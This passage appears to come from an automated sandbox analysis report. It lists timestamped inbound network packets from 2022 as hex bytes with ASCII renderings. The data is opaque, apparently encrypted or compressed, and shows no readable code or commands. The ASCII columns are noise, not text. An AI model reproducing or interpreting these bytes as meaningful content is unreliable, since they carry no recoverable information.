ae 95 85 ea ff 8f 19 79 24 34 19 7d c0 a9 c9 0a 9d 2b 17 d4 d6 dd 08 8c d9 e0 c8 86 19 63 a7 aa 0f d1 95 61 19 e9 e6 4e aa b6 35 c8 4e 8c 8b c2 37 f4 Data Ascii: \>z9U-Owi-/9):UP:_/1F9On2&n-[,j\%xO}WpMho"NV]`F>vy+$R+CYza1t 0oCSM^^\|U:xAZ0y$4}+caN5N7
2022-01-24 13:09:50 UTC	77	IN	Data Raw: 1e 1a 43 d9 2f 31 c6 f0 bc ff 75 0d ed bd 5f ad 09 0c 1d 8b 7a d4 a2 aa 77 de a9 a9 d2 dd 1e 15 4a 99 d9 4d 60 fe 8f dc 7b 4a bd 23 29 3c ab 40 ee 9a 97 a3 61 bc 5d 16 44 32 f8 6f 63 5b a1 bf 8a ff 2b e2 c8 d6 fe 91 bd 07 ee 18 9f 71 6d 24 31 42 6a 0a fa 29 56 86 90 b8 fc cd 1c 80 19 66 8a bf dd 85 ea 79 30 92 53 58 d8 f4 a7 91 25 c4 d4 fd 3a 28 11 3b e6 ba af db fa c1 e5 96 a7 04 53 ec 64 b8 87 2b 8d c7 71 89 99 22 89 45 4b f0 28 12 53 b1 81 ab c4 3d 11 ea 5d e5 08 e3 51 fb c7 0c 2f b9 ae 56 10 0a 70 8c 8d b3 1c 79 f3 92 97 1b 3e c0 ff f8 01 c3 78 fe d7 bc c1 6b 99 2d 47 95 60 8b 69 52 c6 fe 98 06 7c f1 9d d1 38 03 e7 88 95 93 11 1e ca a9 91 b0 6e fc 3c 58 09 38 c8 18 49 20 94 5c 92 ff cc 9a b6 25 03 14 12 a9 43 d3 51 41 47 d6 0a 31 27 43 0e a8 f9 dd 02 Data Ascii: C/1u_zwJM`{J#)<@a]D2oc[+qm$1Bj)Vfy0SX%:(;Sd+q"EK(S=]Q/Vpy>xk-G`iR\|8n<X8I \%CQAG1'C
2022-01-24 13:09:50 UTC	82	IN	Data Raw: 8a 6a f9 a7 2b 06 b0 fa 25 e8 ba 4d c5 c2 cf 3b 00 03 91 41 65 eb f9 ef 00 7c c7 1d ae 22 e4 bf e1 0a 33 4c 80 b0 cc 6f 4a 4f 84 73 20 a5 77 2e 42 c6 bd 7b cc e3 60 97 c4 c0 b5 45 0d 4b 06 4a 47 31 36 6b 5d 61 57 35 b4 76 8d bc be 27 9c bb d5 7d 35 52 bc ba ba ea ac d5 46 90 ce e7 17 12 7b b3 88 c9 be 05 1c e1 ac e4 31 09 1b d9 25 2a 4d c6 b5 73 48 76 23 bc 49 81 2a 07 77 bf c7 e9 a0 aa 7f e7 18 b8 d5 ff 68 8a 57 80 5f 64 71 f7 90 59 b4 66 bb 31 2c 95 b4 53 e1 b6 bb bb 7e 53 5b 12 13 36 fb bf 60 4d a1 bf 89 fd 2a e8 dc f7 a4 80 b4 1a 9f 30 b3 72 77 4c f6 42 7b 07 f3 da 3d 70 ff 8c ef c4 1c 91 10 79 83 01 87 81 79 52 35 a0 f3 da ea 0b b6 91 11 a1 49 c7 2b 2f 38 77 ce 4b a4 54 d9 ed e7 83 bc 16 4e f6 41 f4 94 2d 81 64 40 98 9c 36 f0 f0 8d f0 2c 09 5b cc 81 Data Ascii: j+%M;Ae\|"3LoJOs w.B{`EKJG16k]aW5v'}5RF{1%MsHv#IwhW_dqYf1,S~S[6`M*0rwLB{=pyyR5I+/8wKTNA-d@6,[
2022-01-24 13:09:50 UTC	86	IN	Data Raw: 4c c9 18 89 ae bc fd 37 fd 0b 52 ce 76 2f 95 ad 70 60 16 cf fb 78 a6 8d cc be 0e 3d 4b a9 ef 38 d9 98 90 69 9d 3c 73 e9 45 14 35 24 c5 63 5b 40 d2 27 4c 95 1c 17 9d a4 8e 57 88 5c a8 af b6 41 c8 51 37 33 6f 5a d3 eb db 8f 16 a7 df d7 67 7c 77 5f da eb 38 2c 3c e7 b9 9e 1d ba 25 49 5b 38 71 24 94 a3 69 0b f9 a3 53 d0 8c 7b fd 3a 56 2e ea fb 0d fb ac 9b 42 98 99 39 02 21 a1 6b 71 e0 8d c1 05 13 44 0e ab 39 e7 a1 13 05 33 4c 85 9e fb e0 fd 53 bf 15 22 b4 7d 15 1d d7 b8 67 5d 61 6d 9f ee 5b a2 83 09 4a 13 52 53 b8 5d 6c 75 3a 7f 2c bf f9 ae cf e8 27 9e a0 a3 5c 45 52 bc a3 9b ea 84 1d 46 90 c4 36 95 13 6a b7 f6 79 93 05 18 f4 c6 69 37 21 47 ca 20 31 c7 f9 9d 63 4b 0d e7 af 4d 94 31 26 45 83 52 e3 ad a8 67 7b 0f a9 d2 cc 21 8d 46 8d c6 33 5d f7 92 26 d8 77 bc Data Ascii: L7Rv/p`x=K8i<sE5$c[@'LW\AQ73oZg\|w_8,<%I[8q$iS{:V.B9!kqD93LS"}g]am[JRS]lu:,'\ERF6jyi7!G 1cKM1&ERg{!F3]&w
2022-01-24 13:09:50 UTC	90	IN	Data Raw: 94 33 08 78 23 fc 70 2e 43 76 b4 9f 57 87 7f 44 47 72 1f 17 c7 72 0f 34 1c eb 01 fa ae 95 e7 7a 89 c6 82 39 cc ef d1 b1 88 1c 54 6d 3a d8 3a 1c ae d8 64 bf d0 ea ed c7 6a a2 71 88 09 a2 6d 07 e0 dd 06 fa 86 7b 43 31 b0 4a 2a 1d 82 b4 0e 8b e5 12 11 b6 7a 51 a5 e1 08 1f 60 d5 85 e2 7b 91 7b 15 ee 16 d9 10 d6 5e d7 5f 5b 70 aa 96 a3 ba 87 06 01 0a 74 b6 6a 34 a7 ac 69 be e8 1c f3 70 8e 81 f9 01 90 23 40 da b0 2f 27 93 c6 69 89 4c ac e0 5b ee 36 0c ba a8 5e 78 a8 f2 b3 6a 07 31 b6 b4 ca 57 82 76 a8 af b6 52 fa 57 33 69 dd 5b d3 50 de a7 89 d8 ae dc 4b 7d 52 63 db e8 3a 49 32 82 b9 94 61 a7 24 70 d0 2f 8f 2d b3 af 6d 32 d3 65 51 a3 ac 68 f8 bc 56 2c fd 87 c4 e2 ad 9f 4a ee c1 3f 2a 53 db 43 63 9c 6f cb 00 78 f6 0e ab 33 fe 98 69 35 f9 4c 81 98 fd 6e 4a 45 95 Data Ascii: 3x#p.CvWDGrr4z9Tm::djqm{C1JzQ`{{^_[ptj4ip#@/'iL[6^xj1WvRW3i[PK}Rc:I2a$p/-m2eQhV,J?SCcox3i5LnJE
2022-01-24 13:09:50 UTC	94	IN	Data Raw: 66 52 7a 5c 83 a1 8a f9 9c a0 95 58 c9 5f 18 7c 13 bd 4c 69 01 dc 4b f6 06 f3 65 2e 3b 3a 9d 4d 7a 14 b4 6f c8 fa 31 d4 72 bc c5 39 ca b2 fc 63 69 b1 44 38 5c 4a 2d 31 40 ae 70 f6 99 ca 11 db b4 82 0e 05 cf 76 08 fa 31 f3 79 cd 69 d5 fa ff 68 96 9d 27 cb db 7e 86 a8 46 89 d3 21 b4 17 e4 ef f0 26 eb f3 c9 b5 9e f8 01 80 22 1e 79 20 d5 71 29 5e fc 8e b3 55 9d 8a 4f 41 64 c9 a2 eb 70 12 33 c2 e3 10 28 a4 b0 91 6a 8b ed 60 4e 8c f3 a2 c9 56 14 72 63 4c d9 3a e0 af d8 64 bb 5d c2 ef da 13 7f 0a a9 0c a0 12 f4 6d df 02 9f 7b 78 38 18 9b 4a 3d 05 0e b6 48 81 ed 38 11 b7 6a 51 a7 cb 1f 36 60 b1 10 f4 09 70 7b 15 ea 06 c1 9d d7 74 dd 73 50 5d 84 94 b2 aa ff 0b 18 0a 79 db 90 23 b9 a6 75 95 17 e4 e5 8e be a6 d3 38 99 23 41 b1 18 2f 0b 9b 97 69 a1 d2 71 e3 5f 85 f8 Data Ascii: fRz\X_\|LiKe.;:Mzo1r9ciD8\J-1@pv1yih'~F!&"y q)^UOAdp3(j`NVrcL:d]m{x8J=H8jQ6`p{tsP]y#u8#A/iq_
2022-01-24 13:09:50 UTC	95	IN	Data Raw: 73 19 57 dd 6f a6 fb 7a 8b eb 63 44 9b 1e 8b 3f 9d f0 28 14 57 a0 5b 27 7b 39 0c 30 a3 ee 0a f8 76 ed c1 0f 39 63 ad 99 18 19 66 a5 ae d9 15 6f 29 95 d0 65 2f c5 ef d3 08 90 90 fc d7 be a3 ef 0a 25 5a 35 7f 84 62 49 e7 01 9e 0c 54 6a 80 ce 6d 6d 90 19 ec 55 1b 12 c7 c6 05 a7 b4 67 1d 85 57 5a 1c 6b f9 ba f3 df 46 f3 d7 8f a7 d8 2d 00 1d 96 0c dc 7a 6f 52 fe 28 31 27 3d 9e a8 82 11 2f 69 a6 f4 85 0a 54 15 ab a7 b1 b2 d8 09 ff 15 b9 ca 0e 15 33 77 88 4b 9c bb d6 56 fd 5c 4d 66 50 dd 3d e8 c8 12 82 59 ae 53 23 25 f6 30 69 95 5c 3b a1 1f 43 42 5b cc 82 54 a9 a2 ea ff 87 46 2c 24 1c 13 a1 c2 ff a6 c2 8d 3d 1a ee c9 b2 c7 9a 27 e7 e6 d4 7a 65 a6 ad 1d 07 ad 4d 1b f4 e4 4c fd d5 c6 c8 62 8a 88 58 1e 17 d6 d1 9c 09 57 09 dc d0 83 0f 23 90 01 27 95 c4 08 db bb 58 Data Ascii: sWozcD?(W['{90v9cfo)e/%Z5bITjmmUgWZkF-zoR(1'=/iT3wKV\MfP=YS#%0i\;CB[TF,$='zeMLbXW#'X
2022-01-24 13:09:50 UTC	99	IN	Data Raw: 55 e9 88 ab 7d f6 fe a9 d2 c6 24 99 5f b2 c8 4c 71 f7 92 33 72 79 b1 cb 42 3a a5 42 e0 ba bd a2 7b 42 63 fe 49 36 fb aa e4 77 a9 bf 9a e4 33 07 da f3 f5 83 af 74 0f 26 ec f6 78 2a 2b 4a 7b 12 e4 c8 5c 54 92 83 e4 ec 65 91 10 73 90 44 c3 a5 fb 5a 35 bb 42 bc d9 0a 9a 99 39 d2 53 a6 25 37 4f a9 c2 57 bd d3 f0 fc ef 9f 53 12 73 f8 78 aa 82 03 5f f4 60 8b 94 34 9a 36 95 0e 29 3a 47 a5 44 23 3c 19 ba 37 a3 ee dd 67 55 ef d8 1b 30 63 bc 4d 05 e7 76 8b f2 a1 04 71 76 89 7c dd 3c c3 f0 ed 0b b8 af f6 c8 b1 2e 6d 24 2d 56 59 53 43 12 8a f5 09 98 17 74 ee 7c cf 4b 63 a0 99 e6 55 00 16 d1 b4 68 a6 98 6b 1e 20 49 57 09 70 fd ad 94 51 ba f2 f1 90 a2 ec 00 76 04 a1 c6 5a 70 7e 52 f3 2b 31 2a 4d 05 54 83 37 16 51 a1 b5 93 1e 58 7c 69 af a0 b2 dc b2 ec 11 a2 d0 7b 1f 3a Data Ascii: U}$_Lq3ryB:B{BcI6w3t&x+J{\TesDZ5B9S%7OWSsx_`46):GD#<7gU0cMvqv\|<.m$-VYSCt\|KcUhk IWpQvZp~R+1MT7QX\|i{:
2022-01-24 13:09:50 UTC	103	IN	Data Raw: 65 fa bd cc 00 0d de 0e ab d8 ed a8 7c 1d dd 48 81 9e f7 46 a5 41 97 79 31 b2 6a 00 0e b5 32 70 a3 68 72 92 ea 62 88 45 0b 59 11 55 5b 1c 09 6e 75 3d 5b 46 0c fb a4 b6 ad 2d 8f a2 df 3a da 50 bc ba a7 3d 88 9e 4e bc c3 99 9d 7c 2c b5 f5 0d 62 14 1d f8 c6 71 37 21 4b b6 a0 21 c2 e5 a6 7d 72 05 ec bc 49 94 3b 61 df 81 52 e3 d4 07 7d f6 1c ba db c6 3b e5 c7 8b d0 47 48 19 92 22 7a 77 b2 5a c5 17 b5 59 cf 6a 82 aa 7d 2d ea 38 49 3c 94 3d ee 64 ab ac 80 fd 24 ed f3 2e fa 80 b2 08 9d 1e b3 72 74 24 37 53 74 15 c4 92 55 aa 95 0d fe cb 0b b9 3e 7b 83 47 7e b8 e7 46 21 be 62 04 27 0b bc bd 2b cd 58 c8 29 23 01 26 da 63 5c df f0 eb f0 0c aa 13 5f f0 7a a1 85 22 9d c3 95 9b 9c 32 29 2f 82 e4 3c 02 7f 05 5b 3a 52 2d 2e c3 a7 ee 0c f4 cb ef c1 08 39 70 bd 54 08 0f 5f Data Ascii: e\|HFAy1j2phrbEYU[nu=[F-:P=N\|,bq7!K!}rI;aR};GH"zwZYj}-8I<=d$.rt$7StU>{G~F!b'+X)#&c\_z"2)/<[:R-.9pT_
2022-01-24 13:09:50 UTC	107	IN	Data Raw: eb a6 65 99 d5 30 b0 30 4d a9 f7 25 38 8e 42 6a a6 27 74 8f a7 eb 34 0e c5 40 31 8f ad d8 b5 05 c4 03 b5 be 90 4f 91 7d a8 be bd 4d c6 aa 36 6d 66 62 5b 56 db 8f 18 e6 bd dd 67 67 71 52 ec 16 3d 16 1d b8 32 9a 1b a9 3f 6e 4d 25 8f 36 94 bb 59 e2 d0 49 5b c1 8c 72 97 4f 2d 2e ec e5 38 f1 a6 9b 59 e0 d0 1c fc 2a f7 4a 5d 85 89 cb 00 63 f4 1d a0 33 fc a3 72 3f cd 4d ad 89 fa 6d c4 f2 9e 67 f4 6e 14 fd 19 c6 bb 6e a8 71 6a 97 d3 47 95 48 f3 4b 39 48 25 34 25 6c 73 28 52 2a b0 ea af bc af 2e 83 54 d8 79 63 43 b6 af 9b a3 f5 8d 46 90 da 9b 9e 13 6a be ea 47 40 04 34 e1 aa fc 2e f7 49 cf 34 24 ea e0 b4 73 40 12 ac af 42 85 24 05 02 a9 ac e8 8c a6 6c fc 07 e9 3f d7 32 8a 48 a3 c3 46 71 e6 99 38 84 67 97 3d 7b 8b b6 53 e7 81 95 a1 7b 53 57 25 75 c8 fa 99 fa 6d b9 Data Ascii: e00M%8Bj't4@1O}M6mfb[VggqR=2?nM%6YI[rO-.8YJ]c3r?MmgnnqjGHK9H%4%ls(R.TycCFjG@4.I4$s@B$l?2HFq8g={S{SW%um
2022-01-24 13:09:50 UTC	111	IN	Data Raw: 66 5b 18 3f 1d ff 1f 1f bc be e5 40 8c f5 9f 20 f7 f9 a0 eb 10 1e 5e 4d 42 c3 52 c5 ae c9 67 88 2f c1 c3 f4 06 7a 67 8e 1a 2d 11 dc e0 dc 0e 9d 69 62 cf 04 9a 4a 38 8f 88 a0 60 25 e5 12 1b 9e a6 53 a7 c3 83 03 73 d8 87 e5 01 6e 85 14 c6 3d e0 98 ce 58 ca fe 57 58 84 95 b0 b9 e5 25 15 1c f2 f3 6e 22 94 06 7c 9b 03 cb 5d 70 bf 80 f9 f3 90 23 4c 35 f9 27 34 9e bc 7a 8d 2e 7a 1e 5a c6 33 19 c1 62 41 72 bf df b3 7b 13 16 4b b5 a3 54 9a 65 af af a7 55 e5 aa 36 6d 48 4b d5 4e dd 98 8a de ae d6 66 65 7e 5c dd fe 2b b6 2b 80 b9 9f b9 b8 24 4c 76 80 8f 27 95 8c 99 1e d1 6f cb ce 99 6d f8 a7 2b 32 14 fb 09 c6 bc 9d 5f ed d8 b6 05 2b db 42 68 e8 9b d3 8c 43 dc 0e aa 91 e4 bc 45 9b 33 4c 8b b0 21 6c 4a 4f 0b 62 31 b3 7b 17 1f df 43 70 8f 68 1f 49 c0 4c 80 69 13 50 06 Data Ascii: f[?@ ^MBRg/zg-ibJ8`%Ssn=XWX%n"\|]p#L5'4z.zZ3bAr{KTeU6mHKNfe~\++$Lv'om+2_+BhCE3L!lJOb1{CphILiP
2022-01-24 13:09:50 UTC	115	IN	Data Raw: 23 de 4a e2 28 08 46 2e 3d 28 7f 87 7a 14 bf 6d c8 84 f2 c2 71 14 f9 f5 03 9d c5 76 1c 8a 4e 9a 4c 62 32 25 55 de 5f e2 81 46 51 8c b4 83 17 df 00 7e 3b c5 9a e2 7f d0 72 61 d3 f9 40 3f 43 27 c7 a5 a9 90 38 60 82 c2 24 a2 8c d0 fe f0 24 e1 25 f2 d7 f6 fa 3f 94 22 1e 73 08 e7 76 29 2e 08 b5 bd 4f 9f 74 45 53 54 e5 16 99 74 18 3f 1f ed 19 15 b9 aa f2 69 e8 e9 61 21 db e2 b5 dc 95 e2 5f 6b 6b cb 4c ad 52 d9 60 95 c7 af 3d d2 17 76 1e 74 0c a0 10 c4 8f 0f 00 95 75 14 bd 3a 9a 4c 2a 23 9f 94 5b 9c e5 03 06 ab 84 50 8b cf 09 0c 74 c1 94 e3 06 61 6c 0a e7 eb f0 b2 c0 4f d8 5b 70 5d 84 92 8b 98 f4 20 09 22 eb cc 6e 28 86 ac 72 90 04 f4 f3 61 a8 95 f9 d1 93 0f 4b b8 ec 3f 31 a7 c6 68 8a 31 6c c9 48 fd 34 19 d0 57 47 86 ad f4 a7 7b 12 10 b1 9c ea 56 82 7c c7 58 b7 Data Ascii: #J(F.=(zmqvNLb2%U_FQ~;ra@?C'8`$$%?"sv).OtESTt?ia!_kkLR`=vtu:L*#[PtalO[p] "n(raK?1h1lH4WG{V\|X
2022-01-24 13:09:50 UTC	119	IN	Data Raw: fa be 85 16 dc d7 87 c3 09 29 d6 f6 9e 12 66 f4 00 0e b8 c2 20 1f 90 0e a3 e1 38 78 5c 53 cd 04 d5 f5 d9 23 9c fc 12 04 0c aa b5 e8 9c 95 de 85 35 5d 4b 3c 71 64 cc 35 65 e7 66 f1 43 32 62 96 41 c3 d6 5a 2c 4e bf 07 16 26 56 06 10 49 2b e0 87 4a 4c 80 45 47 64 58 5a 72 f1 f0 13 f8 96 88 8a d5 c6 76 0b 42 7d fb 70 76 04 f9 64 e0 2e 26 4b 74 43 bb 11 4a 7e 0a 2f 59 e1 e0 13 dc 6e 55 cb 30 f5 96 d6 72 6f 9b 2c e4 d4 4f 3e 30 4e a2 fe c7 ac 4b 18 c4 bd 9c 45 1c d2 58 33 ef ad e4 55 b8 01 d0 ea f9 44 2a 97 bd e4 e7 74 b6 27 60 b7 a6 3b a9 a5 e1 fc f0 20 cb 7d 8c 2c 9f fa 2d 8b 29 84 56 25 ec 56 36 5f 97 da aa 7d b2 76 44 46 4e 83 68 72 71 18 3b 03 e0 83 21 82 b5 c3 4e 87 f2 13 3e c7 db 8f c1 8a 1a 74 29 36 43 40 c2 aa c7 6d 09 f4 ed e0 f6 08 71 51 06 0d a0 16 Data Ascii: )f 8x\S#5]K<qd5efC2bAZ,N&VI+JLEGdXZrvB}pvd.&KtCJ~/YnU0ro,O>0NKEX3UD*t'`; },-)V%V6_}vDFNhrq;!N>t)6C@mqQ
2022-01-24 13:09:50 UTC	123	IN	Data Raw: aa a2 67 05 43 a4 bb 9d 27 71 78 61 a0 9b 32 8a 8e ef 11 ac ef ec 0c 32 77 16 66 a0 ac 8b 6c 65 5c 49 77 75 23 1e e9 c8 09 fd b5 82 51 25 05 ce b4 3f 9b 5f 3b af 12 63 9c 55 de 1e 8f 92 94 cc df 06 29 7b 24 3c 8c 7a c0 af d2 22 a1 3f 1c f9 e7 5f 71 02 26 e1 e0 a4 9a 68 a7 ad 83 0a b9 5c 3d de 76 4e ad ae eb 53 65 8e a0 da 34 3a de d3 98 73 ae 7a 44 d1 87 09 53 77 13 26 95 5a 05 34 ab 7e fd e4 39 78 58 69 c9 26 f8 ff e1 11 ae d6 08 2a 0b 2a cb 77 b7 c3 a4 3c a9 5d 4f 27 71 64 cc 2e 65 dc e4 dd 59 1a 6f 32 46 c5 fc 19 7a fa bc 07 14 10 4a 5d a4 43 0d f8 b8 e4 53 8c 6d f0 43 75 4e 7e 8b 10 8a f9 96 ac 3e 48 e3 5b 1f 6b 48 c9 4e 69 0d fb cb 9c b7 21 61 2a 1d bd 10 4a 7a 8e 90 51 dd cd 15 5d 71 1e d4 1d 65 bc d4 72 71 99 63 98 4d 48 14 b2 2f 32 65 e2 85 67 9e Data Ascii: gC'qxa22wfle\Iwu#Q%?_;cU){$<z"?_q&h\=vNSe4:szDSw&Z4~9xXi&*w<]O'qd.eYo2FzJ]CSmCuN~>H[kHNi!aJzQ]qerqcMH/2eg
2022-01-24 13:09:50 UTC	127	IN	Data Raw: 67 bd 40 32 13 44 0d 4e 35 b4 56 34 27 f6 50 16 46 13 9e 0e a4 bc be 05 d8 a4 d9 55 74 7a 91 b2 ab e5 ae 0d 38 09 c5 88 91 33 83 b5 f5 07 24 20 35 e1 8f d5 ce 21 41 d9 05 6b cc ef b5 6f 62 20 ef bc 4f af b3 70 84 80 52 ed 80 53 7d f6 1d 33 f7 fa 20 ac 77 73 d0 4d 71 d7 c3 2c 7a 66 a4 2d 6b 3b b7 53 e1 b0 00 d4 e2 43 5c 3e 69 cc fb b5 ef fe 84 92 99 ca 0f 03 db df fe a0 dd 1e 10 19 ac 69 5d 1a 3a 42 7d 29 6e a9 ce ab 93 ab cf 3f 1c 91 10 e3 a6 6c cd 8f c8 a9 35 aa 4a 87 a3 05 b6 95 26 e5 75 c0 3a 2e 3a ab b0 d2 af db f4 cd 1b 81 ad 13 c5 d4 44 bc b2 0d 77 eb 69 98 bc be 85 3e 8d ef 23 3e 7a a4 5b 3c 72 bf 78 a9 a2 ee 0e c3 bb e8 c1 08 a2 46 80 57 3e 39 8a a7 fe a2 3b fb 27 91 a5 46 22 ed c3 fc 03 be 94 78 a9 21 d1 6c 0c 05 ae 4f 7d d4 97 a5 cb 13 be 26 82 Data Ascii: g@2DN5V4'PFUtz83$ 5!Akob OpRS}3 wsMq,zf-k;SC\>ii]:B})n?l5J&u:.:Dwi>#>z[<rxFW>9;'F"x!lO}&
2022-01-24 13:09:50 UTC	131	IN	Data Raw: 98 a6 a9 77 f6 77 a8 af 96 64 ee 54 37 5e 64 72 fe 54 db 89 2d 5b d0 4f 66 76 7e 6d ac e9 3c 3a 8e a5 94 8f 3d 89 55 59 5e 2e af 66 89 a4 45 02 f9 48 55 d0 8c 40 7a c8 b5 2f ea fe 05 94 ac 9b 48 71 ea 16 13 0d fb 35 64 e1 8d eb 49 6a dc 0e b5 1b c0 aa 6d 33 19 ca ff 01 fc 6e 4e 65 e0 7e 22 b4 e1 23 35 d4 9b 51 d4 63 61 97 e2 1d 9c 45 0d 55 0e 6b 7b 36 27 6a 5f bd 29 ac bf f9 a0 9c c6 24 9e aa 43 70 42 40 9a 90 d3 e2 84 8f 66 fc d2 88 95 0c 5f 9d d8 05 be 03 32 76 d7 6c 37 21 45 f9 5c 21 c2 ef 2f 56 67 1f cb 9c 30 84 35 0e 3d 11 44 e9 a0 b5 67 de 30 ab d2 d1 18 0c 29 13 d1 4d 75 d7 e8 23 7a 66 21 10 6e 04 93 73 9d 9b 86 aa 5b e8 4a 3a 49 29 f1 9d c2 66 a1 b9 a1 6a 51 60 da df fa a0 cf 11 10 19 29 57 58 25 1e 62 00 02 ec d7 77 1e 85 af ef db 17 b9 3d 7b 83 Data Ascii: wwdT7^drT-[Ofv~m<:=UY^.fEHU@z/Hq5dIjm3nNe~"#5QcaEUk{6'j_)$CpB@f_2vl7!E\!/Vg05=Dg0)Mu#zf!ns[J:I)fjQ`)WX%bw={
2022-01-24 13:09:50 UTC	135	IN	Data Raw: ef d0 08 6d 59 a5 0f a0 10 f6 62 a3 9b 94 7f 7f 63 c8 9b 4a 39 b7 a5 99 59 ad c5 e1 10 b6 7a 71 ae d5 1f 1f 7e f7 aa f6 06 76 51 97 94 8c f0 9e d3 7e 29 72 50 58 1e b1 8e ad d2 00 f7 0b 7e cc 4e 33 89 a4 6d 82 3f ce f1 70 b9 a0 57 51 0b 22 46 ad c6 db 26 99 bc f1 af 1c 61 c6 7b 1f 35 08 c7 68 49 64 ac d8 ac 60 3c 2c b7 b4 89 7d 00 08 31 ae b6 56 d8 a2 36 41 6f c0 f6 7b ca a9 27 2f af d6 67 56 5b 51 d9 e8 20 12 39 82 b9 98 31 2f 5e c1 5f 2e 8b 07 68 a5 45 1c 4b 40 7a c2 ac 4a 0f b7 2c 2e ca dd 39 e2 ad 84 43 c3 e2 39 02 2d f1 c1 1b 78 8c cb 04 5c 24 0f ab 33 77 8d 40 24 15 6c 79 99 fd 6e 6a 77 8b 7f 22 af 53 2b 1a c6 bb 5b 25 1c f8 96 c2 48 aa bc 0c 4a 15 d9 73 19 35 4a 55 c2 56 35 be d9 93 a0 be 25 81 a6 f1 78 6d 52 ba 9a 2d 9d 1d 8e 46 94 e4 72 94 13 7b Data Ascii: mYbcJ9Yzq~vQ~)rPX~N3m?pWQ"F&a{5hId`<,}1V6Ao{'/gV[Q 91/^_.hEK@zJ,.9C9-x\$3w@$lynjw"S+[%HJs5JUV5%xmR-Fr{
2022-01-24 13:09:50 UTC	139	IN	Data Raw: 13 25 77 8b 14 e0 81 47 1e 2c 90 83 1d 14 f6 5d 1c ed ab c8 f9 a4 e6 48 eb fd 60 44 9f 27 c1 50 5d bd 2a 4c 88 b3 26 a2 8d ec 06 d4 26 e1 3c fd 9d b3 f8 29 92 08 98 0d 91 e6 70 2d 74 fa b7 b3 55 05 51 69 52 42 c1 64 e9 70 18 1f 1b c9 19 04 b0 b7 cd 7c 89 ed 67 0b 5d 8d 3b c2 8a 18 7e 34 4a da 41 58 8b f5 72 b5 f1 b3 ed d0 17 5c 64 ad 0d a0 09 c0 c8 f0 00 95 79 51 c5 45 03 4b 39 29 a0 c0 4a 8b e5 88 34 9b 68 77 87 bd 1d 1f 60 ff b6 d1 06 70 64 08 c2 38 f3 9e d1 74 5b 0d c9 59 84 90 83 c9 f6 20 03 90 5b e1 7c 04 b5 d1 6f 9e 17 c3 bd 55 bf 8a ce 22 ba 0e 44 a9 e0 04 a1 e7 25 6a 8a 35 53 96 59 ea 34 92 e2 65 4c 5e 8c ae b1 6a 14 21 ee 91 8f 57 9d 62 80 82 b4 52 fe 7e b1 3f f6 5b d3 52 fb f8 05 d9 ae 4c 42 5b 68 6b f9 9f 3e 3a 14 a0 d6 bb 1b a9 3f 4c 76 03 8d Data Ascii: %wG,]H`D'P]*L&&<)p-tUQiRBdp\|g];~4JAXr\dyQEK9)J4hw`pd8t[Y [\|oU"D%j5SY4eL^j!WbR~?[RLB[hk>:?Lv
2022-01-24 13:09:50 UTC	143	IN	Data Raw: ff 19 58 ff 08 2c 3c 80 98 ec b6 c5 8a 9a 4a c4 4e 27 ef 61 0e 3d 43 fc e3 f8 74 08 69 b4 ae c7 fc 00 72 35 95 07 12 25 c7 0b 10 40 0d fa b2 f8 2d 15 6c 6a 62 78 ac 5a ab 8e 10 dc bb 9d b1 6f 13 59 00 64 40 09 67 69 0b cc 61 cf 2c 20 67 04 bb 5c 89 4b 7a 10 95 8d ce eb 35 58 54 33 c6 1b fd 4a d6 72 69 91 ba b1 4d 4e 21 3a 79 86 66 e2 87 6d b8 a5 2d 82 1d 07 fe 82 1c ed ad 78 5a f7 6d 6f cb 0b 42 35 9d 07 c3 e6 78 90 27 61 80 ef 26 a2 8b e6 78 8e bf e0 23 f6 95 6d f8 29 94 b8 3b 5e 1a c1 50 da 56 88 b5 93 58 b3 74 44 5f 5d c9 3b e9 70 1e 15 9a 92 80 05 af bd c5 a5 89 ed 61 bb fe de b0 e5 aa e8 5c 47 48 fa 07 ee ae d8 7f 83 f9 ed ed d0 11 56 f7 f6 94 a1 16 d8 c0 28 00 95 7f e1 66 16 88 6c 19 d8 82 b4 48 ab b3 3e 11 b6 65 5f 8f e4 1d 1f 66 f5 01 8a 9f 71 7b Data Ascii: X,<JN'a=Ctir5%@-ljbxZoYd@gia, g\Kz5XT3JriMN!:yfm-xZmoB5x'a&x#m);^PVXtD_];pa\GHV(flH>e_fq{
2022-01-24 13:09:50 UTC	147	IN	Data Raw: 63 53 ee 59 ab 91 0a f2 db e1 1b 76 07 a2 63 16 55 15 38 b6 2d f4 9e 04 8f 83 aa aa 8f a4 b3 a6 13 0f 16 3c 73 1f ac d8 f7 68 e5 54 6c 88 b8 aa 2b e4 56 90 8c b9 70 14 db d3 7d 05 a2 7b 41 a5 e7 46 f5 f7 85 9a 7b ae 94 f3 36 0d 84 99 82 4d 3a 09 9d f8 92 1e 65 f7 14 24 c3 e5 10 3c 93 61 f0 55 12 59 60 6d 74 0e c8 d1 d5 17 a4 e8 30 1b 16 93 99 d5 8d fd 9a 3d 0b 61 7c 0b c4 6f 7b e9 96 28 94 1d 85 ce b9 58 a2 0b 37 d7 83 06 61 f4 cb f0 1a ef e9 9e 8a 7e 1a 88 8a 4b a0 8c 95 a0 a0 b4 48 45 74 1d 62 6a 4b 99 36 bf f6 88 8a 0b fa a3 fd 2b b9 13 ee d6 96 ed ce d4 e0 b8 a4 cf 6c 98 28 09 d3 1a a3 cf 14 d1 31 51 3a a2 a3 7a 96 22 d7 d5 a1 a1 c2 2c cb 7a 13 d3 ab 5e 0a 21 ba a4 3f cc b7 4e 0b 65 d0 78 cc e3 4a 52 ee 8a 2a 9d 6a 78 c1 23 9e 94 55 3e df 58 74 34 f9 Data Ascii: cSYvcU8-<shTl+Vp}{AF{6M:e$<aUY`mt0=a\|o{(X7a~KHEtbjK6+l(1Q:z",z^!?NexJR*jx#U>Xt4
2022-01-24 13:09:50 UTC	151	IN	Data Raw: 3a 09 01 f5 70 6c 38 1f 6a 0f a5 db ef b2 b4 94 2a f7 78 13 e9 71 f2 9d 1e 5a 00 a1 bd 69 50 31 9d c1 c1 1d 76 56 74 67 a9 fd 9b 92 95 ed 93 00 4d 79 bd a6 09 38 57 71 33 b9 ac a0 12 25 5f f7 e5 c6 56 84 ec 8d e5 c7 62 48 d1 c8 89 6e 6e 5e c5 96 b0 d0 15 04 07 45 a4 63 92 29 4c f0 8f b3 f4 01 d0 1c 2d 38 df 6d cf c4 f4 d4 25 a6 54 77 af 5a 28 18 ea 9a be 5b 8f 06 47 19 62 f4 6f a6 c5 02 8b d3 f3 e0 d8 92 8e ce 77 63 5f 43 52 60 a1 dc 99 59 d2 7e 45 bf d6 94 42 dd 54 95 91 88 0c 6a f0 c5 7d 6b f2 3d 56 af b3 0f eb f3 81 87 2d d9 